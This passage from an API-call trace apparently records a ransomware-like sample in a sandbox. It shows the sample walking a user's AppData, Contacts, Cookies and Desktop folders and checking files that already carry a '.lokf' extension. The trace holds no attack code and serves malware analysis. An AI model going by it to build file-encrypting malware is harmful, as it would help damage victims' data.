returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0146.872] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.872] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.872] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.872] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.872] PathFindFileNameW (pszPath="") returned="" [0146.872] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.872] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.872] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.872] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x59e520b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x59e520b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0146.872] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0146.872] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0146.872] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0146.872] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.872] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.872] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322f210 | out: hHeap=0x6e0000) returned 1 [0146.872] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.872] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.872] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0146.872] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.872] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.872] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.872] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.872] PathFindFileNameW (pszPath="") returned="" [0146.873] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f3c98 | out: hHeap=0x6e0000) returned 1 [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bbe38 | out: hHeap=0x6e0000) returned 1 [0146.873] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.873] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.873] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0146.873] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.873] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.873] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.873] PathFindFileNameW (pszPath="") returned="" [0146.873] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ffcd910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bbe38 | out: hHeap=0x6e0000) returned 1 [0146.873] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ffcd910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.873] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1fee90d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact.lokf", cAlternateFileName="ACLVIH~1.LOK")) returned 1 [0146.873] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.lokf") returned=".lokf" [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.873] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ff0f230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10c6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact.lokf", cAlternateFileName="ADMINI~1.LOK")) returned 1 [0146.873] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.lokf") returned=".lokf" [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.873] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ff5b4f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact.lokf", cAlternateFileName="ASDLFK~1.LOK")) returned 1 [0146.873] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.lokf") returned=".lokf" [0146.873] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.874] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ff5b4f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact.lokf", cAlternateFileName="CHUCUJ~1.LOK")) returned 1 [0146.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.lokf") returned=".lokf" [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.874] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.874] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffa77b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact.lokf", cAlternateFileName="LULCIT~1.LOK")) returned 1 [0146.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.lokf") returned=".lokf" [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.874] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.lokf", cAlternateFileName="SIKVNB~1.LOK")) returned 1 [0146.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.lokf") returned=".lokf" [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.874] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.lokf", cAlternateFileName="SIKVNB~1.LOK")) returned 0 [0146.874] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322f210 | out: hHeap=0x6e0000) returned 1 [0146.874] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.874] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.874] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0146.874] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.874] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.874] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.874] PathFindFileNameW (pszPath="") returned="" [0146.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.lokf", cAlternateFileName="SIKVNB~1.LOK")) returned 0xffffffff [0146.874] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322f210 | out: hHeap=0x6e0000) returned 1 [0146.875] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.875] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.875] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0146.875] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.875] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.875] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.875] PathFindFileNameW (pszPath="") returned="" [0146.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2035fa10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.875] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2035fa10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.875] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89363db0, ftCreationTime.dwHighDateTime=0x1d4ce17, ftLastAccessTime.dwLowDateTime=0x953570b0, ftLastAccessTime.dwHighDateTime=0x1d4cca3, ftLastWriteTime.dwLowDateTime=0x1fff3a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1855c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1jqP 8uN4qhj8sMm4.flv.lokf", cAlternateFileName="1JQP8U~1.LOK")) returned 1 [0146.875] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1jqP 8uN4qhj8sMm4.flv.lokf") returned=".lokf" [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.875] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc40c02d0, ftCreationTime.dwHighDateTime=0x1d4c6ec, ftLastAccessTime.dwLowDateTime=0x4ad91180, ftLastAccessTime.dwHighDateTime=0x1d4cf9a, ftLastWriteTime.dwLowDateTime=0x1fff3a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdbde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Zw20eF9M7.mp4.lokf", cAlternateFileName="1ZW20E~1.LOK")) returned 1 [0146.875] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Zw20eF9M7.mp4.lokf") returned=".lokf" [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.875] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9b17e0, ftCreationTime.dwHighDateTime=0x1d4d455, ftLastAccessTime.dwLowDateTime=0x31724950, ftLastAccessTime.dwHighDateTime=0x1d4c7f7, ftLastWriteTime.dwLowDateTime=0x20019bd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x3ac2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1zXBPnB.gif.lokf", cAlternateFileName="1ZXBPN~1.LOK")) returned 1 [0146.875] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1zXBPnB.gif.lokf") returned=".lokf" [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.875] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4cdc390, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0xabb3d040, ftLastAccessTime.dwHighDateTime=0x1d4d499, ftLastWriteTime.dwLowDateTime=0x20019bd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x97c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4UyQPASLT.wav.lokf", cAlternateFileName="4UYQPA~1.LOK")) returned 1 [0146.875] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4UyQPASLT.wav.lokf") returned=".lokf" [0146.875] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa827e0, ftCreationTime.dwHighDateTime=0x1d4cff8, ftLastAccessTime.dwLowDateTime=0xb151e5d0, ftLastAccessTime.dwHighDateTime=0x1d4c55a, ftLastWriteTime.dwLowDateTime=0x2003fd30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbedc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VDyYw1.m4a.lokf", cAlternateFileName="5VDYYW~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5VDyYw1.m4a.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb751d30, ftCreationTime.dwHighDateTime=0x1d4cb22, ftLastAccessTime.dwLowDateTime=0x93643bf0, ftLastAccessTime.dwHighDateTime=0x1d4d36e, ftLastWriteTime.dwLowDateTime=0x2003fd30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10e3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="60uV9dxrIvRWJYpX2.pps.lokf", cAlternateFileName="60UV9D~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\60uV9dxrIvRWJYpX2.pps.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, 